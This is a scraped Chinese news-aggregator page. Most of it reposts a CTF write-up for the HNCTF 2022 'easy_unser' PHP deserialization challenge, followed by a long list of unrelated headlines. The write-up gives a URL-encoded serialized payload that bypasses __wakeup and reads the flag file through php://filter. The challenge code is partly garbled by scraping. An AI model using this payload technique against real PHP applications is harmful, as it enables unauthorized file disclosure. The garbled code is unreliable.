天天日报丨[HNCTF 2022 WEEK2]

(资料图)

easy_unser

want = $want;        else $this->want = $this->todonothing;    }    function __wakeup(){        $About_me = "When the object is unserialized,I will be called";        $but = "I can CHANGE you";        $this-> want = $but;        echo "C1ybaby!";            }    function __destruct(){        $About_me = "I"m the final function,when the object is destroyed,I will be called";        echo "So,let me see if you can get what you want\n";        if($this->todonothing === $this->want)            die("鲍勃,别傻愣着!\n");        if($this->want == "I can CHANGE you")            die("You are not you....");        if($this->want == "f14g.php" OR is_file($this->want)){            die("You want my heart?No way!\n");        }else{            echo "You got it!";            highlight_file($this->want);            }    }}    class unserializeorder{        public $CORE = "人类最大的敌人,就是无序. Yahi param vaastavikta hai!
";        function __sleep(){            $About_me = "When the object is serialized,I will be called";            echo "We Come To HNCTF,Enjoy the ser14l1zti0n 
";        }        function __toString(){            $About_me = "When the object is used as a string,I will be called";            return $this->CORE;        }    }        $obj = new unserializeorder();    echo $obj;    $obj = serialize($obj);        if (isset($_GET["ywant"]))    {        $ywant = @unserialize(@$_GET["ywant"]);        echo $ywant;    }?>人类最大的敌人,就是无序. Yahi param vaastavikta hai!We Come To HNCTF,Enjoy the ser14l1zti0n 

首先看代码可知，flag在f14g.php中，所以我们只要找到能够利用的点就可以了。

往上看可以看到body类中highlight_file()可以进行利用，所以说我们需要让want为我们想要的f14g.php就可以了。

function __destruct(){        $About_me = "I"m the final function,when the object is destroyed,I will be called";        echo "So,let me see if you can get what you want\n";        if($this->todonothing === $this->want)            die("鲍勃,别傻愣着!\n");        if($this->want == "I can CHANGE you")            die("You are not you....");        if($this->want == "f14g.php" OR is_file($this->want)){            die("You want my heart?No way!\n");        }else{            echo "You got it!";            highlight_file($this->want);            }    } 

但是这边过滤的有点严，若是want=f14g.php，或者说是is_file()中的文件存在的话就会返回"So,let me see if you can get what you want\n"；

所以我们不能直接让want=f14g.php，这里可以用php://filter伪协议来回显f14g.php文件。

构造如下：

";    }$a=new body();echo urlencode(serialize($a));?>

payload:?ywant=O%3A4%3A"body"%3A2%3A{s%3A10%3A"%00body%00want"%3Bs%3A30%3A"php%3A%2F%2Ffilter%2Fresource%3Df14g.php"%3B}

这里注意还需要绕过__wakeup魔术方法，所以%3A %3A中间原本为1，现在为2。

关键词：

• 

  天天日报丨[HNCTF 2022 WEEK2]

  easy_unser<?phpinclude& 39;f14g php& 39;;error_reporting(0);highlight_file(__FILE__);classbody{private$want,$todonothing="ican& 39

  来源： 2023-05-05
• 

  天眼看湾区｜广州狮岭皮具商会会长期待牵手贵州，迎美好未来_每日信息

  　　黔山出珍品，笑迎八方客。　　为借助中国进出口商品交易会平台，积极推介贵州外贸产业，助推“黔品...

  来源： 2023-05-05
• 

  港交所CEO欧冠升：“互换通”是全球首个衍生产品市场的联通机制-天天关注

  “互换通”将于2023年5月15日启动，初期先行开通北向交易，允许我国香港地区及其他国家和地区的境外投资...

  来源： 2023-05-05
• 

  天天速读：《暗黑破坏神4》将于6月2日抢先体验：PC、主机全平台同步

  《暗黑破坏神4》将于6月2日抢先体验：PC、主机全平台同步

  来源： 2023-05-05

• 天天日报丨[HNCTF 2022 WEEK2]

• 天眼看湾区｜广州狮岭皮具商会会长期待牵手贵州，迎美好未来_每日信息

• 港交所CEO欧冠升：“互换通”是全球首个衍生产品市场的联通机制-天天关注

• 天天速读：《暗黑破坏神4》将于6月2日抢先体验：PC、主机全平台同步

• PS5偷盘哥事件更过去 《塞尔达传说》盗版玩家开始举报正版_环球速看

• 可可托海天气预报长期_可可托海天气-环球新要闻

• 天天观察：Rabbitmq 介绍 、安装、基于Queue实现生产者消费者模型、基本使用、消息安全之ack、durable持久化、利用闲置消费、发布订阅、发布订阅

• 中疾控：奥密克戎变异株再次感染，只有少数需医疗干预

• 理想成豪华市场最强中国品牌 仅次于BBA和特斯拉

• 每日报道：明天五一调休要上班！安卓用户喊话iPhone：苹果没节假日闹钟 果粉别睡过了

• 快报：谷歌Pixel Fold折叠屏手机定档5月10日：经典“相机条”设计

• 「学习笔记」AC 自动机

• 全球今亮点！P4093[HEOI2016/TJOI2016]序列

• Python 脚本部署和发布 Django 应用程序的示例代码及注释

• 观速讯丨北京安监局特种作业证查询_安监局特种作业证查询

• 天天即时：【金融街发布】深交所发布两项公司债券信息披露业务指引

• 吃水果为什么可以解酒？苹果葡萄等五种水果最佳

• 滚动：自动驾驶数据遭破坏时 工信部：应能识别记录

• iPhone 14 Pro Max用户换上Redmi Note 12 Turbo 1T版：花2000多很值

• 比亚迪的刀片 终于“捅向”特斯拉|天天最资讯

• 半年亏7千万 老板想跳楼！新能源造富运动结束了_环球新资讯

• 关于雷的成语_关于一的成语_天天滚动

• 声音检测报警模块方案解析

• 【天天时快讯】这座“中国建造”让洪都拉斯人有了更多期盼

• 曝光收车、卖车“套路” 博主被人人车发删稿函

• 天天速递！死磕影像！曝小米14系列将搭载独家WLG高透镜片

• 干翻Java/C++！Python成最受开发者欢迎编程语言：岗位报酬高居第一_环球快消息

• 热点在线丨山东71岁爷爷一年2次外出卖止咳蜂蜜糖：一待就是一两个月

• 当前信息：92岁巴菲特还没有退休计划：曾直言身体“不能再好了”

• 教育部：开展校外培训“平安消费”专项行动

• JavaScript原型链污染学习记录

• 记录-Symbol学习笔记|环球速看

• 璞华助力“数字人社”，为成都市人社数字化建设提供多方位的产品与技术支持！

• ChatGPT背后的打工人：你不干，有的是AI干_今热点

• 世界热讯:elementUi+table实现表格数据滚动

• 中梁控股2023年1-4月累计交付房屋22399套

• 全球热消息：【金融街发布】上交所修订发布公司债券存续期信息披露业务指引

• 每日头条!【财经分析】北京银行多项指标大幅落后同行 城商行“一哥”地位堪忧

• 世界资讯：对标千元级耳机！真我Buds Air5 Pro无线耳机官宣

• 天天热文：全球首例！我国完成介入式脑机接口非人灵长类动物试验：比马斯克公司更安全

• 一老年代步三轮车高速路狂飙：大众车速95km/h勉强跟上-全球新动态

• 新研究表明：超7成用户在手机电量低于20%时感到焦虑

• 《原子之心》通过Steam Deck验证 上手把玩姐妹花！ 当前时讯

• 全球热资讯！歌尔股份发布首款XR智能交互手环参考设计

• 速讯：《安富莱嵌入式周报》第311期：300V可调节全隔离USB PD电源，开源交流负载分析仪，CANFD Trace，6位半多斜率精密ADC设计，开源数学库

• 淘金币在哪里看_淘金币多久过期 世界讯息

• 嵘泰转债异常交易处理结果出炉：匹配成交取消 不影响转股赎回|世界信息

• Redmi MAX 90英寸巨屏电视发布 首发只要7999元 天天关注

• 没有5G卖4G的华为手机好起来了！一季度出货量增加14%：排名全球第十|焦点滚动

• 没有肛门只吃不拉！儿时经常把玩的小虫：如今一斤卖6千-当前看点

• 环球动态:手机通话增加患高血压风险 专家建议：每周接打电话不超半小时

• 反串还是自爆？一日产轩逸车主：高速只开80、尽量不走慢车道_世界焦点

• 厨电行业消费疲软，老板电器该如何突围？

• 天天百事通！绘画手残党的福音：涂鸦线稿秒变绝美图像

• 天天快播：保障用户买到限量版玩具，泡泡玛特用AIGC加持的验证码防范羊毛党

• 【光伏预报/太阳能预报】上海道宁与Solargi为您提供开发地理数据库模拟工具和网络服务 天天亮点

• 今日热门!Vue3项目（Vite+TS）使用Web Serial Api全记录

• 【快播报】抓住医院信息集成平台建设核心诉求

• 奥赛康：股东拟减持公司不超1%股份|环球焦点

• 世界黄金协会：一季度黄金总需求同比增长1% 央行购金仍可能成为今年支撑黄金需求的基石

• 每日看点！李蓓回应基金封盘：宁肯选择维持第二梯队的规模并争取维持一流的业绩

• 小伙日行三万步逛杭州 “特种兵式旅游”致半月板损伤

• 国内一集装箱惊现三辆特斯拉新跑车：被遗弃13年-全球讯息

• 凌晨四点的淄博什么样？烧烤店老板凌晨抢肉：热闹非凡_今日聚焦

• 自媒体称4月份接2笔理想商单共计30万 李想：造谣、法务部出来干活|每日消息

• 官方晒蒂法8岁、13岁美术设定图 身着连衣裙天真烂漫

• 网盘教育专享版，助力高校信息化和科研

• 环球信息:基于原子范数的深度展开网络实现

• 天天看热讯：Apache 配置https虚拟主机

• 世界快看点丨到底什么是小程序插件？

• 天天报道:如何不显示我的电脑、回收站等图标？

• 烟台高新区不断推进工程建设项目审批“应享尽享”水平 世界速看料

• 不愧是高端旗舰 RTX 4090游戏本性能爆棚：前提不差钱

• 高达12种！小米13成为史上颜色最多的小米手机

• 掀翻OLED！苹果自研MicroLED屏幕：进展顺利-每日速看

• 咋回事？董明珠1150万股格力股份遭冻结 市值约4亿元

• 对标拼多多？抖音推出“超便宜的小店”：试水低价电商|全球快看点

• 无锡市举办纪念五四运动 104周年主题团日活动

• 【天天速看料】Java基础学习之大数字处理相关的类有哪些？

• 将Windows系统设置NTP服务器-NetTime篇

• 金仓数据库字符串分割函数_天天速看料

• 深圳：港澳青年在深创业个人最高可贷60万元

• 苹果联合创始人炮轰马斯克自动驾驶画饼：想死就买特斯拉！

• 李佳琦面试75岁奶奶主播引围观：老人直呼为推广国货努力 这是国家自信

• 环球即时：调试器是个大骗子！

• 快速高效的C#FTP文件传输库FluentFTP|全球速讯

• 开心档之MySQL 导入数据-焦点报道

• 开封市通许县四所楼镇：让社情民意联络点当好民声传话筒|全球快讯

• 支持华为HMS服务！酷比魔方Pad 50Pro发布 首发899元

• 世界热点评！陌陌被苹果下架 官方回应：技术问题正解决 老用户不影响

• 这五一超20万人去淄博：鲁C变身网红旅游名城_快资讯

• 当前讯息：怎么看？老人欲插队被服务员严词拒绝：前有插队婆孙被网曝 还被做车贴很恶心

• 功能不成熟 马斯克推特直播秒变马赛克 网友吐槽：8-Bit埃隆_世界新要闻

• 今年全国快递业务量突破400亿件

• 常用的热门 API 汇总 环球热推荐

• 即时看！jasperreport开发手册--ireport教程

• 世界百事通！什么是EMR？为什么要以电子病历（EMR）为核心，建设医院信息集成平台？

• 安全验证必备——语音验证码短信 API 当前快看

• 火山引擎 DataTester 上线全新 MAB 智能调优实验

• 坎普斯boss怎么打_坎普斯怎么打_当前快讯